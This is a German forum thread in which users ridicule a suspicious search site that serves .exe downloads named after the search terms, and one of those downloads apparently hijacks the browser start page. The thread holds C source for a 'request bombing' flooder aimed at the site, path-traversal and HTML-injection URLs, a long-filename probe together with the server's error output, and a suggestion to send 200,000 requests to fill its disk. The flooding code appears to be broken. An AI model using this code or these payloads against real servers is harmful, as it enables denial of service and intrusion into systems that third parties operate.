3. Was soll das denn sein?

Was soll das denn sein?

  • M

    Die scheinen außerdem aus den Sucheingaben ohne weitere Überprüfung den Pfad durch Anhänhgen von .exe zu erstellen. Wenn man zum Beispiel "../xyz" eingibt, erhält man einen permission denied-Fehler für das übergeordnete Verzeichnis. 🙂

    0
  • C

    Es kann ja mal einer dem Besitzer der Domain schreiben und fragen, was seine lustige Suchmaschine im Netz bezweckt. Die Daten gibt's bei denic.

    Hab versucht, ein kleines Prog zu schreiben, welches Requestbombing durchführt,
    hab aber keine Lust, weiter zu machen, weils nicht funktioniert! Hier der Code!

    #include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

#define BUF_SIZ	4096

int send_request(const int sock, const char *hostname)
{
	char request[BUF_SIZ];
	int i;

	while (1){

	sprintf(request, "GET la2/?param=%d&search=finden%A0%21&cat=fb_loc HTTP/1.1\r\n"
		, i);

	if (send(sock, request, strlen(request), 0) == -1)
	{
		perror("send() failed");
		return 1;
	}

	}
	return 0;
}

int view_response(const int sock)
{
	char response[BUF_SIZ];
	int bytes;

	while((bytes = recv(sock, response, sizeof(response), 0)) > 0)
		fwrite(response, 1, bytes, stdout);

	if (bytes < 0)
	{
		perror("recv() failed");
		return 1;
	}

	return 0;
}

int main(int argc, char *argv[])
{
	struct hostent *host;
	struct sockaddr_in addr;
	int s;

	WSADATA wsa;
		if (WSAStartup(MAKEWORD(1, 1), &wsa))
		{
			printf("WSAStartup() failed, %lu\n", (unsigned long)GetLastError());
			return EXIT_FAILURE;
		}

	if (argc < 2)
	{
		fprintf(stderr, "usage: %s <host>\n", argv[0]);
		return 1;
	}

	s = socket(PF_INET, SOCK_STREAM, 0);
	if (s == -1)
	{
		perror("socket() failed");
		return 3;
	}

	printf("connecting to %s:80...", inet_ntoa(addr.sin_addr));
	fflush(stdout);

	addr.sin_port = htons(80);
	addr.sin_family = AF_INET;

	if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
	{
		perror("connect() failed");
		return 4;
	}

	puts("ok.");

	if (send_request(s, argv[1]))
		return 5;

	if (view_response(s))
		return 6;

	return 0;
}

    Hoffentlich verstosse ich damit nicht gegen das Teledienstgesetz oder was da sonst so greifen könnte.
    Wenn der sich n Spass mit uns erlaubt, dürfen wir das doch auch!

    Viel Spass damit!

    0
  • ?

    BF_31 schrieb:

    Meine Suche habe ich aber nicht geladen (googlewatchblog) und ist trotzdem da. Ich bezweifel das ein anderer danach gesucht hat

    woher weißt du, dass es da war, wenn du es nicht geladen hast? vielleicht wirds ja erst erzeugt, wenn du es runterlädst?

    0
  • B

    phräger schrieb:

    BF_31 schrieb:

    Meine Suche habe ich aber nicht geladen (googlewatchblog) und ist trotzdem da. Ich bezweifel das ein anderer danach gesucht hat

    woher weißt du, dass es da war, wenn du es nicht geladen hast? vielleicht wirds ja erst erzeugt, wenn du es runterlädst?

    Weil es sich in dem Verzeichnis befindet das Moh gepostet hat.

    0
  • ?

    BF_31 schrieb:

    phräger schrieb:

    BF_31 schrieb:

    Meine Suche habe ich aber nicht geladen (googlewatchblog) und ist trotzdem da. Ich bezweifel das ein anderer danach gesucht hat

    woher weißt du, dass es da war, wenn du es nicht geladen hast? vielleicht wirds ja erst erzeugt, wenn du es runterlädst?

    Weil es sich in dem Verzeichnis befindet das Moh gepostet hat.

    autsch. das hab ich überlesen.
    naja, dann waren wohl wirklich stümper am werk...

    wie lang sind eigentlich die maximalen dateinamen auf einem server?

    0
  • P
     

    Warning: copy(exe_files/DasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServer.exe): failed to open stream: File name too long in /home/www/ph2s500/html/la2/cfile.php on line 7

Warning: fopen(exe_files/DasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServerDasIstEinScheißServer.exe): failed to open stream: File name too long in /home/www/ph2s500/html/la2/cfile.php on line 8

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 9

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fputs(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 11

Warning: fclose(): supplied argument is not a valid stream resource in /home/www/ph2s500/html/la2/cfile.php on line 12

    😃

    0
  • S

    ROFL 😃

    Das gibt's doch nicht!! 😮

    0
  • ?

    Hi!

    Ich hab mal sone exe auf mein Schrottrechner gezogen.
    War eigentlich nix weiter dran, aber Prlötzlich erscheint immer ein
    Icon "Internet Explorer". Aber denkste. Das ist nicht der Internetexplorer,
    sondern ein Link zu www.finding.de

    Außerdem ändert der Internet Explorer jedes mal beim schließen seine
    Sartseite, also auch auf www.finding.de

    Hat jemand ne Ahnung, wie ich das wieder weg kriege?

    0
  • G

    Wollt ihr wissen, was der Kerl als nächstes ausheckt? Ja? Dann probierts mal mit http://www.error-page.de/la3/ . Ist aber irgendwie das selbe. Habe ne Zeit lang probiert, das ganze zu hacken, hat nicht geklappt *g*
    geloescht

    EDIT: In der neuen Version ist es sogar möglich, ../ zu verwenden...
    EDIT2: Schreibe beliebige Infos in die Antwort-Seite (also nicht die .exe): http://www.error-page.de/la3/?param=u">HIERDEINENACHRICHT&search=finden

    0
  • M

    Mann, sowas geiles hab ich schon ewig nicht mehr gesehen! 😮

    😃

    0
  • ?

    War bestimmt die selbe WebAgentur, die auch die Arbeitsamtseiten damals geschrieben hat.

    0
  • ?

    geloescht schrieb:

    Habe ne Zeit lang probiert, das ganze zu hacken, hat nicht

    Dann hast du nicht die richtigen Werkzeuge 😉

    0
  • I

    *rofl* das ist so geil 😃
    ich spiel grad ein bisschen mit der
    vermutlich 1. version http://www.error-page.de/la/
    die scheint noch verbuggter zu sein

    Ps. ich seh grad man kann auch sachen uploaden..*freu*

    0
  • G

    Die habe ich acuh schon gefunden. Allerdings geht der Upload nicht und ich finde die 3. Version besser. Da kann man nämlich auch in das darunterliegende Verzeichnis speichern.
    geloescht

    0
  • ?

    mal was anderes: hier im forum wird ja ab und zu gefragt, wie man dynamisch dateien an exen anhängen kann.
    jetzt wissen wir auch, was die leute daraus machen... 🤡

    0
  • ?

    Hmm, vielleicht benutzen sie auch einfach nur einen raffinierten Komprimieralgorithmus.
    Der mathematische Beweis, dass sich jede Datei auf genau 384KB packen lässt, müsste natürlich noch erbracht werden.

    0
  • F

    Der Typ kommt kir komisch vor, Google findet da noch tolle Sachen über den: Google: "Lev Weinberg"

    Gruß

    0
  • F

    Achja, den Namen vom DL kann man mit einem einfachen HTTP-Header bestimmen, und es ist immer die selbe Exe-Datei!

    D:\test>..\MD5\md5sum.exe *
f22d39020a6a21c6f75e1e628dbcf6e7 *132.exe
f22d39020a6a21c6f75e1e628dbcf6e7 *lol.exe

    Gruß

    0
  • W

    ROFL, Download now funktioniert echt super.

    0
  • F

    Sende mal einer 200.000 Request dann sind gut 50GB Speicher weg 🤡

    Gruß

    0
Anmelden zum Antworten